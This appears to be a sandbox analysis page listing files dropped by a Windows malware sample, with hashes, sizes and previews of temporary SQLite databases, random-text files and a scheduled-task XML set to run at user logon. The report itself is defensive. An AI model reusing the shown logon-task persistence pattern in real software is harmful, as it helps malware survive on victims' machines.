                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7E64.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7E65.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7EFF.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.690299109915258
                      Encrypted:false
                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                      Malicious:false
                      Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                      C:\Users\user\AppData\Local\Temp\tmp7F0F.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                      C:\Users\user\AppData\Local\Temp\tmp7F10.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.698473196318807
                      Encrypted:false
                      SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                      MD5:4D0D308F391353530363283961DF2C54
                      SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                      SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                      SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                      Malicious:false
                      Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                      C:\Users\user\AppData\Local\Temp\tmp7F11.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.690299109915258
                      Encrypted:false
                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                      Malicious:false
                      Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                      C:\Users\user\AppData\Local\Temp\tmp7F12.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                      C:\Users\user\AppData\Local\Temp\tmp7F23.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.698473196318807
                      Encrypted:false
                      SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                      MD5:4D0D308F391353530363283961DF2C54
                      SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                      SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                      SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                      Malicious:false
                      Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                      C:\Users\user\AppData\Local\Temp\tmp8652.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1581
                      Entropy (8bit):5.102603067114144
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtgxvn:cgergYrFdOFzOzN33ODOiDdKrsuTwv
                      MD5:099BCB5EEFDA967FB42CBFF292294B06
                      SHA1:0C578D760B3B64BE25746F809E401608D7327547
                      SHA-256:7616743C046E4B3D5A8A7D7363B4AD53132313B9ECDBBF11959879E219C1CC6A
                      SHA-512:A2D1C20E6E73C8D21E42F68D58751A0E7520D719CEFD7105CF6701B3161DC59801BD4AD1CE57978A522C19D5E085958C04B9FBF2A020CDABA824A45C8A02F511
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                      C:\Users\user\AppData\Local\Temp\tmp8CCB.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8CDC.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8CED.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8CEE.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA4D3.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpA541.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpAD91.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1581
                      Entropy (8bit):5.102603067114144
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtgxvn:cgergYrFdOFzOzN33ODOiDdKrsuTwv
                      MD5:099BCB5EEFDA967FB42CBFF292294B06
                      SHA1:0C578D760B3B64BE25746F809E401608D7327547
                      SHA-256:7616743C046E4B3D5A8A7D7363B4AD53132313B9ECDBBF11959879E219C1CC6A
                      SHA-512:A2D1C20E6E73C8D21E42F68D58751A0E7520D719CEFD7105CF6701B3161DC59801BD4AD1CE57978A522C19D5E085958C04B9FBF2A020CDABA824A45C8A02F511
                      Malicious:false
